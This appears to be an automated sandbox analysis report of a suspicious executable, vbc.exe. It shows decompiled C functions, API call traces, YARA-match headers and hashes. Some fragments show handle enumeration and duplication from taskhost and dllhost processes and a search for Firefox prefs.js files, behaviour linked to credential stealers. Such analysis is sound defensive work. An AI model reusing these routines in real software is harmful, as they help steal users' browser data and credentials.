                                                  0x0040d395
                                                  0x0040d39c
                                                  0x0040d3ac
                                                  0x0040d3ae
                                                  0x0040d418
                                                  0x0040d3be
                                                  0x0040d3c0
                                                  0x0040d3d9
                                                  0x0040d3dd
                                                  0x0040d3df
                                                  0x0040d3e6
                                                  0x0040d3eb
                                                  0x0040d3ec
                                                  0x0040d3f1
                                                  0x0040d3f5
                                                  0x0040d404
                                                  0x0040d407
                                                  0x0040d413
                                                  0x0040d413
                                                  0x0040d407
                                                  0x0040d3f5
                                                  0x0040d3c2
                                                  0x0040d3c2
                                                  0x0040d3d2
                                                  0x0040d3d2
                                                  0x0040d3c0
                                                  0x0040d429
                                                  0x0040d435

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$FileFindFirst
                                                  • String ID: *.*$prefs.js
                                                  • API String ID: 2516927864-1592826420
                                                  • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                  • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                  • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                  • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                  0x00406680
                                                  0x00406680
                                                  0x00406680
                                                  0x00406688
                                                  0x0040668b
                                                  0x0040668d
                                                  0x0040668d
                                                  0x0040668f
                                                  0x00406693
                                                  0x00406697
                                                  0x0040669b
                                                  0x004066a1
                                                  0x004066a7
                                                  0x004066aa
                                                  0x004066b4
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c8
                                                  0x004066d7
                                                  0x004066f5
                                                  0x004066d9
                                                  0x004066db
                                                  0x004066e0
                                                  0x004066e0
                                                  0x004066e6
                                                  0x004066f1
                                                  0x004066f1

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameSavestrcpy
                                                  • String ID: L
                                                  • API String ID: 1182090483-2909332022
                                                  • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                  • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                  • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                  • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}











                                                  0x0040adb3
                                                  0x0040adc9
                                                  0x0040add3
                                                  0x0040ade7
                                                  0x0040adee
                                                  0x0040adf5
                                                  0x0040adfc
                                                  0x0040ae03
                                                  0x0040ae1e
                                                  0x0040ae2d
                                                  0x0040ae4a
                                                  0x0040ae4a
                                                  0x0040ae5b
                                                  0x0040ae6f

                                                  APIs
                                                  • memset.MSVCRT ref: 0040ADD3
                                                  • SetFocus.USER32(?,?), ref: 0040AE5B
                                                    • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FocusMessagePostmemset
                                                  • String ID: l
                                                  • API String ID: 3436799508-2517025534
                                                  • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                  • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                  • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                  • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                  0x00408441
                                                  0x00408449
                                                  0x0040844e
                                                  0x0040845a
                                                  0x00408465
                                                  0x00408467
                                                  0x00408469
                                                  0x0040846d
                                                  0x00408471
                                                  0x00408481
                                                  0x00408488
                                                  0x00408490
                                                  0x00408496
                                                  0x00408499
                                                  0x0040849d
                                                  0x0040849d
                                                  0x004084a1
                                                  0x004084a2
                                                  0x00408467
                                                  0x00408465
                                                  0x004084aa

                                                  APIs
                                                  • memset.MSVCRT ref: 0040845A
                                                  • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: "
                                                  • API String ID: 568519121-123907689
                                                  • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                  • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                  • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                  • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                  0x0040661e
                                                  0x00406624
                                                  0x00406629
                                                  0x0040662c
                                                  0x0040662f
                                                  0x00406635
                                                  0x0040663c
                                                  0x00406643
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406654
                                                  0x0040665b
                                                  0x0040666a
                                                  0x0040667f
                                                  0x0040666c
                                                  0x00406670
                                                  0x0040667b
                                                  0x0040667b

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameOpenstrcpy
                                                  • String ID: L
                                                  • API String ID: 812585365-2909332022
                                                  • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                  • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                  • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                  • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407BB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadMenuA.USER32 ref: 00407BC1
                                                  • sprintf.MSVCRT ref: 00407BE4
                                                    • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                    • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                    • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                    • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                    • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                    • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                    • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                  • String ID: menu_%d
                                                  • API String ID: 3671758413-2417748251
                                                  • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                  • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                  • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                  • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406325, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406325(char* _a4) {

				if( *0x417550 == 0) {
					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
				}
				strcpy(_a4, 0x417550);
				return  *0x417658;
			}



                                                  0x00406332
                                                  0x00406340
                                                  0x00406340
                                                  0x0040634a
                                                  0x00406357

                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                  • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DirectoryWindowsstrcpy
                                                  • String ID: PuA
                                                  • API String ID: 531766897-3228437271
                                                  • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                  • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                  • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                  • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408348, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00408348(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E00406160(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                  0x00408348
                                                  0x00408349
                                                  0x00408351
                                                  0x0040835b
                                                  0x0040835d
                                                  0x0040835d
                                                  0x0040836d

                                                  APIs
                                                    • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                  • strrchr.MSVCRT ref: 00408351
                                                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileModuleNamestrcatstrrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 3097366151-1948609170
                                                  • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                  • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                  • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                  • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403397, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

				_t2 =  &_a12; // 0x403428
				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
			}



                                                  0x0040339d
                                                  0x004033b5

                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID: (4@$Server Details
                                                  • API String ID: 1096422788-3984282551
                                                  • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                  • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                  • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                  • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                  0x004084ce
                                                  0x004084d6
                                                  0x004084dc
                                                  0x004084e1
                                                  0x004084e3
                                                  0x004084f3
                                                  0x00408505
                                                  0x004084f5
                                                  0x004084f5
                                                  0x004084f8
                                                  0x004084fa
                                                  0x004084fd
                                                  0x00408500
                                                  0x00408500
                                                  0x00408507
                                                  0x00408509
                                                  0x0040850c
                                                  0x00408514
                                                  0x00408526
                                                  0x00408516
                                                  0x00408516
                                                  0x00408519
                                                  0x0040851b
                                                  0x0040851e
                                                  0x00408521
                                                  0x00408521
                                                  0x00408528
                                                  0x0040852a
                                                  0x0040852d
                                                  0x00408535
                                                  0x00408547
                                                  0x00408537
                                                  0x00408537
                                                  0x0040853a
                                                  0x0040853c
                                                  0x0040853f
                                                  0x00408542
                                                  0x00408542
                                                  0x00408549
                                                  0x0040854b
                                                  0x0040854e
                                                  0x00408556
                                                  0x00408568
                                                  0x00408558
                                                  0x00408558
                                                  0x0040855b
                                                  0x0040855d
                                                  0x00408560
                                                  0x00408563
                                                  0x00408563
                                                  0x0040856b
                                                  0x00408571

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                  • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                  • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                  • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                  0x00406a7e
                                                  0x00406a80
                                                  0x00406a85
                                                  0x00406a88
                                                  0x00406a8f
                                                  0x00406a92
                                                  0x00406a96
                                                  0x00406a99
                                                  0x00406a9c
                                                  0x00406aac
                                                  0x00406a9e
                                                  0x00406aa0
                                                  0x00406aa0
                                                  0x00406ab2
                                                  0x00406ab8
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ad0
                                                  0x00406ac1
                                                  0x00406ac3
                                                  0x00406ac3
                                                  0x00406ae3
                                                  0x00406af0
                                                  0x00406afc
                                                  0x00406aff
                                                  0x00406b06
                                                  0x00406b0c

                                                  APIs
                                                  • strlen.MSVCRT ref: 00406A80
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                    • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                    • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                    • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                  • memcpy.MSVCRT ref: 00406AE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$memcpy$mallocstrlen
                                                  • String ID:
                                                  • API String ID: 3669619086-0
                                                  • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                  • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                  • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                  • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: vbc.exe PID: 968 Parent PID: 2148 vbc.exeCOMMON

                                                  Executed Functions

                                                  Function 00408836, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040885E
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                    • Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                    • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                  • _wcsicmp.MSVCRT ref: 0040898B
                                                  • _wcsicmp.MSVCRT ref: 0040899E
                                                  • _wcsicmp.MSVCRT ref: 004089B1
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
                                                  • memset.MSVCRT ref: 00408A38
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
                                                  • _wcsicmp.MSVCRT ref: 00408A8B
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
                                                  • FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 1954110673-3398334509
                                                  • Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                  • Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
                                                  • Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
